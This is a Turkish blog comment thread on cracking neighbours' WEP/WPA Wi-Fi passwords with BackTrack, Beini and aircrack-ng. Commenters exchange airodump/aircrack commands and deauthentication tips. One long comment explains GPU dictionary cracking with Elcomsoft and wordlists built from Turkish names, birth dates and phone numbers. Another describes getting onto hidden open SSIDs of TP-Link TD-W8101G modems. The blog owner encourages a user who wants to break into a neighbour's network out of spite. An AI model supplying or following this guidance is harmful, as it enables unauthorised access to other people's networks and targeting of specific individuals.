    Murat Çeşmecioğlu: Öncelikle bu sitede kafana göre küfür edemezsin. Sana nasıl saldırıldığını bilirsen kendini ona göre savunabilirsin. Bence yukarda yazdıklarımı okuyup kendini savunmayı dene.
    Ardından bu siteye tekrar girme. İstediğin siteye girip istediğin siteye girmeme özgürlüğün var.

  60. #95 emrah tarafından, tarihinde

    izlemek istiyorun

    • #96 Murat tarafından, tarihinde

      Neyi izlemek istiyorsunuz?

  61. #97 serdar tarafından, tarihinde

    murat herseyi cok gzul yazmıssın da benim sole bi problemim var
    airodump-ng wlan0 yazinca bir suru wireless buluyorum ama sag tarafta ” fixed channel mon0: -1 ” cıkıyor
    bu yazı cıktıgı zaman birturlu handshake yakalayamıyorum
    wireless kartım b4318
    ubuntu kullanıyorum bi yardımcı olurmusun 🙂

  62. #98 kaan tarafından, tarihinde

    alkan :
    arkadaşım yararlı bir paylaşım olmuş.şunu merak ediyorum.
    – bu wordlistler bt programı içinde var mı?varsa yukarıda yazdığın komudu yazınca mı ortaya çıkacak?
    -mesela ben wordlist bulsam usbye atsam onu nasıl kullanabilirim bt programı usb yi görür mü?
    -bende var olan wordlistleri bt programnda nasıl kullanırım?
    ilgine şimdiden teşekkür ederim

    cd den çalştırıyorum wordlisti nereye atacagım

  63. #99 hakan tarafından, tarihinde

    ağındaki bağlantıya sürekli anlık şifre deneyen program yokmu acaba?

  64. #100 Burak tarafından, tarihinde

    Uzun bir aradan sonra tekrar gelebildim nete biraz yoğundum =) bir kaç arkadaş beini ile ilgili soru sormuşufacık bir açıklama yapayım.backtrack ten bir farkı yok yine aynı şekilde live cd. tek farkı wep şifre kırmak biraz daha kolay işletim sistemini açıp birkaç tıktan ibaret 128 bitlik web şifreyi 10-15 dk içerisinde kırıyor.bu arada türk telekomun vermiş olduğu tp-link TD-W8101G model modemlerde bir olay keşfettim.modemde default olarak 4 adet kablosuz ağ adı açık ilk olanı TD-W8101G yazıyor diğer adlar ise gizli adı değiştirselerde önemsiz mac adreslerine bakıldığında ard arda olduğu akla geliyor.kablosuz ağ adını girincede ağa dahil oluyorsunuz uğraşsız bir tavsiye:) telekom ve tp-link açığı 🙂

    • #101 Murat tarafından, tarihinde

      Biraz daha açabilir misin bunu?

  65. #102 burak tarafından, tarihinde

    türk telekomun anlaşmalı olarak son zamanda verdiği modemlerden biri tp link marka modeli ise TD-W8101G.bu modemde fabrika ayarı olarak kablosuz ağ adı (SSID) 4 farklı ayrı ayrı ağ olarak görünüyor ve kapatılamıyor.Yani kablosuz ağları tarattığımızda xp üzerinde görünmüyor ancak windows 7 de ağ adı gizli olan kablosuz aları görebiliyoruz diğer ağ olarak.veya ağ kartlarının programlarındada görünüyor ve verilen bu mdem bir çok yerde var.her neyse ağları tarattığınızda eğerki ağ adı gizli ve şifresiz ağ görünüyorsa çevredeki modemlerin mac adreslerine dikkatli bakarsanız gizli ağın mac adresi o ağlardan biriyle eşleşecektir eğerki eşleşiyor ise şu durumu kesinlikle öneririm.örneğin12:34:56:78:34 mac adresli gizli bir ağ yakaladık diyelim kablosuz ağlistesinde bu mac adresinin aynısı olup ancak en son değeri bir altı olan mac adresli modem aynı modemdir.

    • #103 Murat tarafından, tarihinde

      Öyle bir modem gördüğümde ilk işim bunu denemek olacak 🙂
      Teşekkürler

      • #104 burak tarafından, tarihinde

        ama bu isimsiz aglardan internete giriyormu beyler

    • #105 burak tarafından, tarihinde

      burak internete giriliyor mu bari

  66. #106 hakkı tarafından, tarihinde

    bende programı dvd ye yükleyenlerdenim wep i beceremedim wpa denedim handshake yaptım oldu ama en son artık yazarken keyler.txt boyut olarak büyük olduğundan (windowsa göre d harddiskinde) o dosyayı masaüstüne atamıyom yer yok diyor o dosyayı enson kısımda nasıl okuturum şu kısımda yazıcak olursak nasıl yazılmalı
    aircrack-ng -a 2 wpadeneme-01.cap -w keyler.txt

  67. #107 koray tarafından, tarihinde

    selamlar öncelikle bu kaliteli paylaşımlar için teşekkürler.
    Ben windows 7 min üzeine VM Virtualbox ve işletim sistemi olarak Ubuntu kullanıyorum aircrack i yükledim ve dediğiniz gibi iwconfig yazıorum ve
    lo no wireless extensions.

    lo no wireless extensions.
    çıkıyor.
    wlan0 veya vmaster0 gibi birşey çıkmıyor maalesef 3 gündür arıyorum fakat bi çözüm bulamadım.

    ağ bağdaştırıcım Broadcom 802.11n

    Yardımcı olabilirseniz çok sevinirim.

    • #108 Murat tarafından, tarihinde

      Virtualbox’un penceresinin alt kısmında USB, klasör vb. ikonların olduğu bir çubuk var. Oradaki USB simgesine sağ tıklayıp ağ kartınızı seçtiğinizde kendi bilgisayarınızdan çıkartılıp sanal makinanıza takılacaktır.

  68. #109 Musti tarafından, tarihinde

    selam. aircrack-ng ile denenen wordlistlerde acaba türkçe karakter içeren keyler denenmiyor mu? Çünkü 80.000 lik bir list oluşturdum aircrack i çalıştırdığımda yarısını denemedi. Eğer öyleyse türkiyede wpa kırmak imkansız hale geliyor. Bu kanu hakkında bilgis olan var mı?

  69. #110 Senfoni tarafından, tarihinde

    Selam Aleyküm..Wep İşi anlatımınızın mükemmelliği ile birlikte 1 2 üretkenlik sonucu 1 akşamda tmmdır 🙂 su an kırdığım ağ üzerinden yorum yazıorum..tabiki 2 3 gün sonra kırmış olduum cep telini arayarak bu arkadaşı bilgilendiricem ama önce kırmam gereken bir wpa var uyuz oldum 😀 ..
    bnm takıldığım nokta wpa da keylerin yolunun belirtilmesi noktası eğer txt dosyasını bin root klasörlerini yada backtrack desktop da alırsam vermem gereken yol diizmi nasıldır.. k bakmaın ilk kez dün gece backtrack kullandımda bilmiorum 🙂 eline sağlık.ben bu tarz paylaşımları insanlara faydalı olarak görüyorum.çünkü bir wirelessi nasıl oluşturacağımı nasıl koruyacağımı ve nasıl dağıtabileceğimi çok iyi anladım 🙂

  70. #111 alihan tarafından, tarihinde

    ya ben bu işi kolay zannetmiştim bilgisayardan hiç anlamadığımı düşünüyorum artık ben bunu 1 yılda yapamam ben hala çaılştıra ne yazınca root@bt gelior anlamadım 😀

  71. #112 mehmet tarafından, tarihinde

    arkadaslar wpa için bence kasmayın nekadar uğraştıysam olmuyor.wpa crack için elinizdeki wordlist ile kıracağınız şahsın şifresi olmalı.örneğin türkçe bir wordlistiniz dahi olsa “ali1234″şeklinde basit bir şifre bile wordliste yoksa olmuyor yani.handshake yakalayamayan arkadaşlar eğer Deauth atak yapıp yakalayamıyor ise kullanıcıyı netten düşüremiyor demektir.wpa tamamen şans web ise sınırlı sayıda kombinasyon içerdiği için kolay.bütün kombinasyonlar backtrak ile geliyor zaten.

  72. #113 cglkr tarafından, tarihinde

    hocam şimdiden kolay gelsin ben de bu şifre kırma işiyle uğraşanlardanım bi kaç tane wep şifresi kırdım onlar çok daha kolay ama kırdığım ağda netim çok yavaş hatta benim mobil telefondan bile yavaş bazen işimi görecek kadar oluyo ama bazen bağlanmak işkence gibi, bunun nedenini bir açıklarsanız sevinirim. bi de wordlist isteyen arkadaşalara tavsiyem kendi wordlislerini oluşturmaları bunu netten bulabileceğiniz basit bir programla çok rahat yapabilirsiniz ama şu var bu wordlisleri bizim bilgisayarlarımız çok yavaş deniyo yani bu saatler alabilecek bi konu şimdiden teşekkürer… :))

  73. #114 zülküf tarafından, tarihinde

    SELAMLAR YENİDEN GELDİM BU ARALAR YOĞUNDUM..
    SAYIN MURAT BEY ŞİMDİ YİE KENDİMİ WPA KIRMA İŞLEMİNE BAĞLADIM
    ÖNCELİKLE BURAK ADLI KİŞİ O AĞ ADI BENİM BİLGİSAYARDA DA GÖRÜNÜYOR Bİ PROGRAM VAR valla bak adını unuttum ama 2 3 tane mac adresi buluyordu yanında artı işareti tıklıyordum bakıyordum aynı mac edresi hepsi eger dedigin gibiyse hangi adı girmemiz gerek bumu TD-W8101G bunumu girecez şifre olarak yada buna benzer ad degişikligi yada numara degişikligide olabilir benim pc de yani o şifre denen yere o ağın adınımı girelim TD-W8101G bunun gibi olsa yani cvb pls saol

  74. #115 zülküf tarafından, tarihinde

    murat kardeş orada yazmışsın
    Birisini ağdan düşürdükten sonra aircrack ile o dosyayı kontrol ediyorsun ve 0 handshake mi yazıyor?
    airodump komutundan –ivs parametresini sildin mi?
    aircrack kullanırken dosyanın uzantısını .cap olarak gösteriyorsun değil mi?

    Başka bir bildiğin ağda denemeler yaptın mı? Örneğin ben anlatımlarımda kendi modemimi kullanıyorum. Senin yada bir arkadaşının modeminde deneyebilirsin. Belkide senin sorunun modemden kaynaklıdır.
    EVET 0 HANDSHAKE YAZİOR BU 1. SORU İÇİN 🙂
    2. SORU İÇİN İSE NİE AİRODUMP PARAMETRESİNDEKİ İVS İ SİLEYİM İVSİ SİLİP CAP YAPAYIM
    3. SORU İÇİN İSE ZATEN HANDSHAKE YAKALAYAMIYORUM YAKALASAM ZATEN YAPARIM CAP OLARAK KAYDEDERİM VERİLERİ AMA ANLAMADIĞIM ŞİMDİ YAKALAYAMIYORUM HANDSHAKEYİ AİRCRACK LA TARATINCA 0 HANDSHAKE YAZİOR YANİ YAKALAMIŞIM YAKALAMAMIŞIM DİE ANLAMAM İÇİN UZANTIYI CAP MI YAPMAM GEREK AİRCRACK TAN TARATIRKEN 🙂 CVB PLS

  75. #116 zülküf tarafından, tarihinde

    BAK BAŞKA AĞLARDA DA DENEDİM YAKALAYAMIYOR AYRICA SANA BİR ŞEY DİECEM AİREPLAYI KULLANINCA AĞDAN DÜŞÜRÜNCE O AĞA BAĞLI KİŞİ AİRODUMP TA ALT TARAFTA AĞDAN DÜŞÜNCE GÖRÜNMEMESİ LAZIM DEİLMİ EGER ÖYLEYSE BEN YAPINCA DEAUTH U KAYBOLMUYOR YANİ DAHADA GENİŞLETELİM BU KONUYU ARTIK Bİ AÇIĞA KAVUŞTURALIM

    • #117 ender efe tarafından, tarihinde

      kardeşim aynı şey bende de oluyor.Ama pc düşmese bile handshake yakalayabiliyor bazen.

  76. #118 zülküf tarafından, tarihinde

    MURAT BEY CVB PLS…?

  77. #119 murt tarafından, tarihinde

    Walla bişe anlamadm…

  78. #120 buylegalsteroids tarafından, tarihinde

    I love murat.cesmecioglu.net , bookmarked !

  79. #121 Murat Beg tarafından, tarihinde

    Elimde Mevcut 100 gb sayı kombinasyonlu 11 haneli wordlist var bunu denemek için hangi programı kullanmalıyım ve nasıl gerçekleştirebilirim resimli anlatırsanız memnun olurum.Elcomsoft bunun için iyi programa benziyor ama kullanmayı bilmiyorum yazmışsınız forumda ELCOMSOFT’u anlatacağım diye hala TIK Yok 😀 Şimdiden Bekliyorum Elcomsoft’u Anlatmanızı

    • #122 Murat tarafından, tarihinde

      Elcomsoft’u anlatacağım diye birşey demedim hiçbir forumda. Facebook’ta nasıl kullanılacağını bilmiyorum dedim.
      Elcomsoft ile şifre kırmayı anlatmayı düşünmüyorum şu anda.

  80. #123 meriadoc tarafından, tarihinde

    backtrack de wpa2 kırabilir değilmi ?
    airoscriptde olmuyor sanırım..

    • #124 Murat tarafından, tarihinde

      Elinizde uygun wordlist varsa kırılır tabiki.

  81. #125 fatih tarafından, tarihinde

    selam çevremde wpa-psk bağlantılar var hatta birisnin adını soyadını telefonunu biliyorum ama bu halde tüm denemelerime ragmen kıramadım msn eklerseniz gerekirse ücret karşılıgında anlaşabiliriz veya yardım şimdiden teşekkürler..

    • #126 Murat tarafından, tarihinde

      Karşınızdaki kişinin adını, soyadını ve telefon numarasını bilmek şifreyi kırmanıza pek yardımcı olmaz. Sadece deneme yaptığınızdaki tahminlerinizi çoğaltırsınız.
      MSN’den yardım istemek yerine buradaki yorum bölümünü kullanabilirsiniz.

      Para karşılığında kıracak olsam kendi sitemde bilgimi paylaşmazdım zaten. Eğer yinede kırmam için ısrar ederseniz 10.000 TL (on bin türk lirası) karşılığında deneyebilirim. Ücreti peşin alırım, kırıp kıramayacağımı garanti etmem, kıramadığım durumlarda para iadesi yapmam 😀
      Bedava bilgiye para vermeye kalkarsanız zararlı çıkarsınız 😀

  82. #127 beril tarafından, tarihinde

    kendi internet şifremi unuttum sadece laptobumdan girebiliyorum format atarsam ondan da giremiycem ne yapmam gerekiyor :/

  83. #129 ender efe tarafından, tarihinde

    murat kardeşim selamlar.handshake yakalamak ağdan ağa değişebilen birşey bana göre.Ben bazı ağlarda yakalıyorum bazılarında yakalayamıyorum.Hatta bu ağlarda deauth atak bile yapmıyorum bilgisayarlar kendileri bağlanıyor.Bu haldebile bazen yakalanmıyor.Worldlist için ise bnce forumda paylaşılan 9 gb worldlisti kullanmak yararlı olacaktır.

  84. #130 faik tarafından, tarihinde

    selamlar
    sayfanızı yeni gördüm ve çok beğendim. bir yerde takılıp kalıyorum backtrack ta airodump-ng -c 11 mon0 komutunu yazınca bash: /usr/sbin/airodump-ng: Input/output error çıktısını alıyorum 11 yerine değişik rakamlarıda denedim ama bir türlü buradan ileri geçemedim sorun ne olabilir acaba. teşekkürler…

  85. #131 mutlu tarafından, tarihinde

    usta sen bıdaha anlat sunu be kesın oluyormu ?

    • #132 Murat tarafından, tarihinde

      🙂 Neyi anlatiyim?

  86. #133 Cemil tarafından, tarihinde

    Merhabalar, acaba güvenilir, Türkçe için uygun bildiğiniz bir WPA wordlist var mıdır?

    • #134 Murat tarafından, tarihinde

      Hayır türkçe bildiğim bir wordlist yok. Ben wordlist kullanmıyorum, WPA’ları kırmak için bile uğraşmıyorum.

      Bi kaç tane mantıklı şifre denemesi yapıyorum. 12345678 gibi. Örneğin ağın ismi Beşiktaş ise ve WPA şifrelemesinde ise en az 8 karakterli bir şifre oluşturmanız gerekir. Benim denediğim şifre 19031903 oluyor. Olmazsa besiktas1903 deniyorum. 1903besiktas, bjkbjk1903 gibi aklıma gelen kombinasyonları denedikten sonra hala bulamadıysam uğraşmıyorum 🙂

  87. #135 veyseloglu tarafından, tarihinde

    Ya tamam da, şifresini bildikten sonra niye kırmaya calisayim ki? wordlist dediginiz en düsuk 10 gb. internet cafeye gidip bunları indireceğime internet olunca indireceklerimi indiririm daha mantikli ?!

    • #136 Murat tarafından, tarihinde

      Bu da bir çözüm fakat bu durumda internete para vermiş oluyorsunuz ama 🙂

  88. #137 hasan tarafından, tarihinde

    Murat Hocam
    Bu wpa ile ilgili sorun şu ki .cap dosyasını windowsa atarak elcomsoftla kırmayı planlıyorum. Lakin LiveCD olarak kullandığım backtrackta bu ayarlamayı nasıl yapmam gerekiyor.. Yardımların için şimdiden teşekkürler..

  89. #138 yunus tarafından, tarihinde

    cogu wpa da sayı kombinasyonları oldugu için ben 8 ile 10 haneli bütün sayı kombinasyonlarını yazdırdım txt olarak ama bunu nasıl bt4 ile kulancam ? usbye at ordan kulan demisin 1s/media konut tam olarak bu olmaya bilir üsten bakıp yazmadım broke li bi ifade cıkıyo bunu yazınca ayrıltılı bi şekilde wordlist i bt4 de kulanmayıda açıklarsan sevinirim dostum şimdiden teşekkürler murat 🙂

  90. #139 Musthe tarafından, tarihinde

    Arkadaşımız amatör kullanıcılar için neredeyse eksiksiz bir şekilde anlatmış. Ancak wpa şifresi kırmada anlatıma başlamadan önce wordlist vurgusu yapılmalı bence. Çünkü bu işin olmassa olmazı bu. 3-4 yıldır bu işle yoğun bir şekilde uğraştım. Bazı püf noktalardan da bahsetmek isterim. Murat beyin GRUB lu başlangıcını 3 sene kadar önce ne yazıkki 20-30 deneme sonucunda pc yi birkaç kez bozarak bulmuştum sizin işiniz gerçekten çok kolay olmuş 🙂 bt4 tavsiyemdir. Handshake yakalayamıyorum diyen arkadaşlar için ilk önerim KDE menüsünden Services den “Start Network Service” başlatmaları tabi daha öncesinde Wireless kartınızın dinleme modunu destekleyip desteklemediği daha önemli bir unsur. İkinci konu ise murat beyinde söylemiş olduğu gibi handshake yakalamış yalnız göremiyor olabilirsiniz. Modeme bağlı birine maksimum 10 deauth atağı uyguladığınızda %95 oranla bir handshake almışsınızdır. şimdi brute force işlemine bt de devam etmenizi önermiyorum. Şifre kırma işlemi için tabi ki EWSA yani elcomsoft iyi bir ekran kartına sahipseniz saniyede 50.000 kadar şifre deneyebiliyor. Hazır bu konuyu açmışken şunu belirteyim. Elinizde çok fazla wordlist bulundurmalısınız. ben wordlistler için harici 1 TB lik bir hdd almıştım 600 GB civarında wordlist var. tüm ev ve cep telefonları (türkcell,vodafone,avea), doğum tarihleri, türkçedeki tüm isimler ve isimlerin tüm doğum tarihleriyle eşleşmesi ahmet1956 gibi 8-9-10-11 haneli numara kombinasyonları ve birkaç bana özgü wordlist daha 12 ve üzeri sayılı kombinasyonlar TB lerce yer aldığından elimde bulunduramıyorum ancak bu ekipmanla yaklaşık 50-60 wpa ve wpa2 şifresi kırdım. Deneyimlerimden yola çıkarak en çok kullanılan şifrelerin; 18051985-19051905-123456789-123456789as-kullanıcının ev telefonu ve cep telefonu çok kullanılan şifreler arasında tabi arada sırada 11111111a gibi vb. şifrelerede rastlamak mümkün. bu tip wordlistlerde kombinasyonuna göre değişsede milyonlarca şifre bulunuyor ve makinanızın performansına bağlı olarak bt içersinde 400-500/sn şifre denemesiyle sanırım 3-4 ay alır şifreyi kırmak 🙂 Bu yüzden iyi bir ekran kartı +Elcomsoft öneriyorum. nVidia’nın tesla sı ile saniyede 100.000 şifre denenebildiğini duydum. bu gerçekten inanılmaz benim elimde ATI var ve saniyede 12.000 şifre görüyorum buda işimi oldukça kolaylaştırıyor. Bazı arkadaşlar Elcomsoftla ilgili bilgi istemiş kullanımı çok basittir. Bt üzerinde kaydetmiş olduğunuz xxx.cap adlı dosyayı windowsa taşıyın. Elcomsoftu çalıştırın file bölümünden import tmpdump dan .cap dosyanızı gösterin. Size hemen yakalanmış olan handshakeleri gösterecektir.(Bt arayüzünden “Wpa handshakes …) yazısı çıkmamış olsa bile) burdan handshakenizi tikleyin. 2. adım olarak optionsdan dictionary tıklayın en üstten kullanacağınız tüm wordlistleri programa gösterin. hemen alt bölümde “mutation” yani çiftleme bölümü vardır isteğinize bağlı olarak hepsini işaretleye bilir yada kaldırabilirsiniz. bu kullandığınız şifreleri clonlar örneğin wordlistinizde ahmet1956 olan şifreyi ikiler ve o şekilde de denemiş olur ahmet1956ahmet1956 gibi. Tavsiyem ilk etapta mutasyonun tamamını kapalı tutmanız yönündedir. Program pc nin tüm gücünü kullancaktır. Bu yüzden makineden elinizi kolunuzu çekmelisiniz. tüm bu ayarlamaların sonunda Elcomsoft anaekranından START ATTACK kısmıyla denemeler başlar. şifre bulunduğunda program otomatik durur ve size şifreyi verir. Son olarak GPU power kısmında ekran kartınızı görmelisiniz. “No compatible devices found” gibi bir yazı görüyorsanız ekran kartınız elcomsoftu desteklemiyordur yada ekran kartınızın güncellenmesi gerekiyordur. Elcomsoft öncesinde sitesinden hangi ekran kartlarının desteklendiğine bakmayı unutmayın. Ayrıca ekran kartınızın desteklenmediği durumda elcomsoftla cpu hızınızda (400-500/sn) işlem yapmaya devam edebilirsin ancak şifre bulma işleminiz oldukça uzayacaktır. bu işle uğraşıyorsanız desteklenen bir ekran kartı alın. Çok uzun yazmış olabilirim. Ancak bazı bildiğim şeyleri paylaşmak istedim. Herkese bol şans!

  91. #140 rahim tarafından, tarihinde

    merhaba hocam şu an iki tane ağ buldu biri şifreli biri şifresiz fakat bir türlü bağlanamıyorum şifresiz olana hep windovs bağlantısını yapamadı diyor. başka bir şey demiyor sorun gider diyorum kablosuz ağ veya erişim noktası sorunu düzeltilemedi diyor ne yapmam gerek

    • #141 Murat Çeşmecioğlu tarafından, tarihinde

      Ağa çok uzakta olabilirsiniz.

  92. #142 Burhan Şanlı tarafından, tarihinde

    Göster ama verme derler ya ne güzel söylerler.
    Mümkünse bize wordlist adresi verebilirmisin yada kendi wordlistini bizle paylaşabilirmisin?

    • #143 Murat Çeşmecioğlu tarafından, tarihinde

      Keşke mümkün olsada wordlistimi verebilsem ama gerçekten wordlist kullanmıyorum. WPA şifrelerini kırmak için uğraşmıyorum bile.
      Ağın ismi “Beşiktaş” ise 19031903 yazıyorum, tutmazsa 12345678 yazıyorum. Yine olmazsa bırakıyorum peşini. Oyun açıyorum 🙂

  93. #144 devhar tarafından, tarihinde

    merhaba kardeş benim sorunumu halledersen minnettar kalırım ben beini kullanıyorum wpa şifresi kırma ekranına geliyor ama beinin kendi wordlisti yetersiz ben wordlist eklemek isityorum beiniye wordlist nasıl ekleniyor kafayı yiycem herşeyi yaptım birtürlü içine atamadım beini iso dosyasından klasöre cıkarıyorum öyle atıyorum bu defada bilgisayarı başlattığımda beiniden başlamıyor ne olur yardım et wordlist nasıl yüklerim beiniye ben cd den kullanıyorum ne olur kardeş yardım et şimdiden çok teşekkürler beiniye wordlist yüklemek isityorum sorunum bu

  94. #145 devhar tarafından, tarihinde

    arkadaşlar wordlistleri beiniye nasıl eklerim acaba bir türlü ekleyemiyorum

  95. #146 lodos tarafından, tarihinde

    arkadaşlar ben handshake yakalamak için daha kısa bir yol buldum resimlerde gösterildiği gibi bunu yapınca sağ üstte hemen wpa handshake (mac adresi) çıkıyor. Yöntem şöyle ağı dinlemeye başladıktan sonra çevredeki ağları gösteren bir program var backtrack 5 R1 sürümünde onu açıyosunuz ve o ağa bağlanmaya çalışıyorsunuz(şifre bölümünü sallayın) burda amaç kıracağımız ağ modemi ile bilgi alış verişinde bulunmak. umarım anlatabilmişimdir.bu işlerde yeniyim. Öylesine kurcalarken bunu farkettim.Eğer yanlış bişey ise beni düzeltin lütfen saygılar.

    • #147 Murat Çeşmecioğlu tarafından, tarihinde

      En yakın zamanda deneyeceğim. Sağolun.

      • #148 lodos tarafından, tarihinde

        farklı ağlarda denerken birşey daha gözüme takıldı. eğer ağ bulucuda(wicd wifi gibi bişeydi tam hatırlamıyorum adını) dinleyeceğiniz ağ için kısa bir şifre sallarsanız hemen modem cevap veriyor ve handshake yakalayamıyorsunuz. Bu nedenle en az 15 karakterlik bir şifre yazarsanız modemin yazdığınız şifreyi gözden geçirip onaylama süresi arttıgından daha uzun süre bağlantıda kalıyorsunuz ve handshake i kapıyorsunuz 😀 Murat bey aşağıda da sormuştum ama şu SHELL KONSOLE açmayı söylerseniz çok sevinirim.Çok sinir oldum ya internette aradım her yere baktım ama nasıl açılacağını bulamadım.şimdiden teşekkür ederim.

        • #149 Murat Çeşmecioğlu tarafından, tarihinde

          shell consoldan kastınız normal komutları yazdığımız konsol değil mi?

          O konsolu ekranın sol altındaki kısayollardan ikincisine basarak açabilirsiniz.

  96. #150 lodos tarafından, tarihinde

    bu arada murat bey bişey sormak istiyorum o kadar aradım ama backtarck 5 te shell konsole açmayı başaramadım.Eğer nasıl yapıldığı konusunda yardımcı olursanız çok sevinirim.

  97. #151 lodos tarafından, tarihinde

    http://imageshack.us/photo/my-images/714/screenshotxt.png/
    masaüstünü yukarıdaki linkte verdim. Sizin dediğiniz gibi sol altta değil benim kısayollar terminal i de açtım. Sorun işte burda yani pencere başlığında root@bt: yazıyor sizin resimlerinizdeki konsolda root@bt: -Shell -Konsole yazıyor. Bu shell konsole sonradan mı yükleniyor acaba yoksa backtrack in içinde varmı. varsa .nasıl çalıştırırım. bide masa üstünü nasıl sizinki gibi yapabilirim. cevabınızı bekliyorum. teşekkürler.

    • #152 Murat Çeşmecioğlu tarafından, tarihinde

      Resmi görünce anladım. Siz GNOME versiyonunu kurmuşsunuz. Benim resimlerde örnek verdiğim KDE versiyonu. Arasında işleyiş olarak bir fark yok. İkiside farklı masaüstü yöneticileri sadece.
      Sizin açtığınız terminal doğru.

  98. #153 lodos tarafından, tarihinde

    cevabınız için teşekkkür ederim . Gereçekten çok açıklayaıcı oldu saolun. çalışmlarınızın devamını diliyorum iyi günler.

  99. #154 lodos tarafından, tarihinde

    Sonunda ! wep kırmayı başardım 🙂 sıra wpa da 😀

  100. #155 muhammed tarafından, tarihinde

    çok güzel olmuş emeğinize sağlık

  101. #156 erdem tarafından, tarihinde

    “airmon-ng start wlan0” komutunu yazıyorum,sonuç olarak :
    Interface Chipset Driver
    ethl Broadcam wl

    sonrasında

    “airodump-ng -c 11 mon0” komutunu yazdığımda şu hatayı alıyorum:
    “ioctl(SIOCGIFINDEX)failed: No such device”

    ne yapmalıyım?

  102. #158 ssss tarafından, tarihinde

    no such device hatasını alıyorum “airodump-ng -c 11 mon0” komutundan sonra

    • #159 Murat Çeşmecioğlu tarafından, tarihinde

      iwconfig komutunun çıktısını yazabilir misiniz?

  103. #160 karizmatik tarafından, tarihinde

    arkadaşlar iyi hoşda bu puroğram nerden iniyor bilen yok yardımcı olabilirseniz dua edecem:)

  104. #162 umut ömer tarafından, tarihinde

    hocam bende iwconfig komutunu yazdığımda driver olmadığını söylüyor realtek 8191SE driveri ni nasıl yüklerim yardımcı olursanız sevinirim saygılar…

    • #163 Murat Çeşmecioğlu tarafından, tarihinde

      Driver yükleme kısımlarını bilmiyorum ne yazıkki. Öğrenirsem anlatacağımdan emin olun 🙂

  105. #164 Abdülhamit tarafından, tarihinde

    Murat, WPA ne zaman kırılır tahminince?

    • #165 Murat Çeşmecioğlu tarafından, tarihinde

      Bu konuda herhangi bir tahminim yok 🙂
      WPA şifreleri kırmayı bile denemiyorum. Bigisayarınızda bir kaç küçük oyun taşımanız internet bulamadığınız durumlarda güzel oluyor 🙂

  106. #166 mrtpsm tarafından, tarihinde

    handshake yakala sağlam bir list oluştur ölme eşşeğim ölme 🙂 çok çalışmamız lazım çok :))

  107. #167 uğur tarafından, tarihinde

    boardcom kartları olanlar bt yi kullanamayacaklar mı

    • #168 Murat Çeşmecioğlu tarafından, tarihinde

      Ben şifre kırmada kullanamadım. Benim kart modelimin sürücüleri olmayabilir. Yine de denemek lazım. Ama anlattığım şekilde kendi internetime bağlanabildim. İnterneti kullanabiliyorsunuz fakat dinleme yapamıyorsunuz.

  108. #169 haci tarafından, tarihinde

    bu backtrac pogramını indirirsem 4 gb kotanın yüzde kaçını aşar tahmin veya cevap yada kaç mb tır tşk

    • #170 Murat Çeşmecioğlu tarafından, tarihinde

      Backtrack 5 RC1 sürümünü indirdiğinizi vasayarsak kotanızın %50,9 ‘unu harcayacaktır.

      Hesaplamalar şöyle;
      Backtrack: 2085MB
      Kotanız : 4096MB
      Backtrack / Kotanız = 2085 / 4096 = 0,509

      Yüzdelik dilim istediğiniz için bunu 100 ile çarpıyoruz;
      0,509 * 100 = 50,9

      🙂

  109. #171 Emirhan63 tarafından, tarihinde

    merhaba murat hocam
    öncelikle emeginize saglik
    sorumu sormadan önce yaptigim islemleri anlatayim
    Beini programiyla bir kac tane wep key kirdim kendi baglantim oldugu halde
    ama takinti gibi birsey oldu bende
    gecen gün arkadasin baglantisini onun yaninda kirdim (iddia üzerine ) o da gördü simdi ise wpa yapti az cok eski sifrelerini biliyorum kendi adini tuttugu takımı dogum yılını filan kullaniyor sifre yazarken
    bunlardan kombinasyon yapıyor
    sorum su anlattiginiz islemlerde sona geldim 1 tane de handshake yakaladim
    ekran görüntüsünü (link:http://imageshack.us/photo/my-images/84/screenshot1012215420.png/) en son bu simdi benim sorum su : bu handshake i bruteforce ile kirmaya kalksam olmazmi bunu backtrack ile yapabilirmiyim 2, sorum ise iki japon bilim adami kasim ayinda wpa nin nasil kirildigini gösterecekmis bu konudan haberiniz varmi
    cevap icin tsk elr simdiden
    kolay gelsin

    • #172 Murat Çeşmecioğlu tarafından, tarihinde

      Handshake’in olduğu dosyayı windows’ta Elcomsoft adlı programı kullanarak kırabilirsiniz. Bu program sizin ekran kartınızın işlemcisini de (tabi kartınız uyumlu ise) kullanarak daha hızlı kırmanıza yarıyor.
      Fakat bu halde bile günler, haftalar söz konusu.

  110. #173 Emirhan63 tarafından, tarihinde

    tsk ler hocam denedim tüm programlari elcomsoftla uyumlu degil maalesef

  111. #174 haci tarafından, tarihinde

    birde sınırsız bir internet te backtrack indirirsek ek bi ücret gelir mi yoksa aynı mı?

    • #175 Murat Çeşmecioğlu tarafından, tarihinde

      Ek bir ücret söz konusu değil. Sonuçta internetten bir dosya indiriyorsunuz.

  112. #176 ayşe tarafından, tarihinde

    öncelikkle merhaba.ben istanbulda okuyorum.ve evimde yaklaşık 5 10 tane wireless bağlantısı var yani dışardan gelen:) hatta bunlardan birinin hemen alt komşumuzdan geldiğini farkettim.şifresi yoktu..bi süre kullandım ama içim rahat etmedi.indim aşağı anlattım durumu.faturayı birlikte ödeyelim ve birlikte bi şifre koyalım dedim.ama kabul etmediler ve kendileri bi şifre koyup bana söylemediler.şuan onlara çok sinirliyim….ve onların şifresini kırmak istiyorum.şifre kırmayla ilgili yazınızı biraz okudum.teknolojiden yani bilgisayardan pek anlamayan biri olarak sizce bunu başarabilirmym.??? lütfen cevap yazın..

    • #177 Murat Çeşmecioğlu tarafından, tarihinde

      Öncelikle komşunuzu uyarmakla çok yanlış birşey yapmışsınız 🙂
      Anlattığım gibi yaparsanız başarabilirsiniz. Tabiki bunda modemin şifrelemesi vs. gibi olasılıklarda var.

      Sonuçta denemeden bilemezsiniz.

  113. #178 ayşe tarafından, tarihinde

    kesinlikle yanlış yaptığımın farkındaym:)

    anlattığım gibi yaparsanız diyorsunuz ama okuduğumda çoğu şeyi anlamadm yani farklı bi dil bu..sanırım sizden çok şey istiyorum

  114. #180 Mazlum tarafından, tarihinde

    ISrarlarına rağmen burada yazacağım. Diyelim ki benim modem şifrem : aplsqlt1q7r olsun. Ben bu ve buna benzer şifreleri kırabilir miyim ? o bana lazım kesinse evet kesin kırabilirsin deyin değilse kesin değil deyin herhangi bi yorum istemiyorum ..

    • #181 Murat Çeşmecioğlu tarafından, tarihinde

      Teşekkür ederim.

      Evet, teknik olarak bu şifreyi kırmak mümkün. Ama çok uzun bir zaman gerekir. Bu yüzden ben WPA ve WPA2 şifrelerini kafanızdan atarak tutturmayı denemenizi öneriyorum.

      Böyle bir WPA şifreli modemin olduğunu kabul edelim.
